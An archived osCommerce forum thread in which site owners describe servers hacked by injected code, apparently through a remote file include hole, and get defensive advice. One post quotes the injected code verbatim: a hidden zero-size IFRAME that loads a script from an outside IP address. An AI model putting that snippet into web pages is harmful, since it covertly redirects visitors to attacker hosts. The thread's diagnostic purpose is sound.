Jump to content
  • Checkout
  • Login
  • Get in touch

osCommerce

The e-commerce.

Security issue?


ludachris

Recommended Posts

Hey guys, I am in the process of cleaning up all the sites on one of our servers (for the 3rd time) that was hacked due to what we think was a Remote File Include Vulnerability. Here are some links that explain the exploit:

 

http://www.exploits.in/pnphpbb-remote-file...nerability.html

http://securitydot.net/xpl/exploits/vulner...50/exploit.html

http://securitytracker.com/alerts/2006/Feb/1015624.html

http://www.soledadpenades.com/2006/05/28/i...h-nothing-to-do

 

Again, I'm not positive if that is the security hole for sure. Basically what happened was, they somehow found a way to write to every file on our server. They added a few lines of IFRAME code that was meant to redirect our visitors to other sites. Every single file on the server was affected, although not all files had the same code added. Some had multiple lines of the same code, others had just one line. It's a dedicated server, and all sites on the server are ours.

 

The problem is I can't narrow down if it's due to a script we're running or if it's something else. I was hoping someone could tell me with 100% certainty that OScommerce isn't the security hole. We're running other scripts and are checking with the developers of those as well.

 

Any help would be appreciated. Thanks!

Link to comment
Share on other sites

So long as you are running MS2 and have installed the 2 latest security fixes you should be okay.

 

Nothing is absolutely secure especially when dealing with the web. All that can be done is to close the holes as they are found. This is true for everything (e.g. OSs, applications, extensions, etc).

 

It could be that someone brute-forced their way into your FTP account to accomplish what they did.

 

Have you checked the owner and group of the modified files as this would give you an idea of what account was used to perform the modifications?

 

In case you haven't already done so, I highly suggest you change *every* password on your server (i.e. root user, your user, database user, ftp user, store admin, etc).

"Great spirits have always found violent opposition from mediocre minds. The latter cannot understand it when a man does not thoughtlessly submit to hereditary prejudices but honestly and courageously uses his intelligence." - A. Einstein

Link to comment
Share on other sites

where is this code coming from? When download my page and view the source i can't it anywhere, please help

 

<IFRAME SRC="http://81.95.146.133/sutra/in.cgi?17" WIDTH=0 HEIGHT=0 FRAMEBORDER=0 SCROLLING="no" style="display:none;"></IFRAME><IFRAME SRC="http://81.95.146.133/sutra/in.cgi?17" WIDTH=0 HEIGHT=0 FRAMEBORDER=0 SCROLLING="no" style="display:none;"></IFRAME>

Link to comment
Share on other sites

jmac, Instead of hijacking someone else's thread you should start your own thread regarding your problem.

 

In answer to your question, it looks like you have a hacker's exploit installed somewhere, most likely in your application_top.php file.

"Great spirits have always found violent opposition from mediocre minds. The latter cannot understand it when a man does not thoughtlessly submit to hereditary prejudices but honestly and courageously uses his intelligence." - A. Einstein

Link to comment
Share on other sites

  • 3 weeks later...

Where are these two security fixes? I'm looking at the osCommerce site and I can't seem to find them.

 

justin

 

 

So long as you are running MS2 and have installed the 2 latest security fixes you should be okay.

 

Nothing is absolutely secure especially when dealing with the web. All that can be done is to close the holes as they are found. This is true for everything (e.g. OSs, applications, extensions, etc).

 

It could be that someone brute-forced their way into your FTP account to accomplish what they did.

 

Have you checked the owner and group of the modified files as this would give you an idea of what account was used to perform the modifications?

 

In case you haven't already done so, I highly suggest you change *every* password on your server (i.e. root user, your user, database user, ftp user, store admin, etc).

Link to comment
Share on other sites

Archived

This topic is now archived and is closed to further replies.

×
×
  • Create New...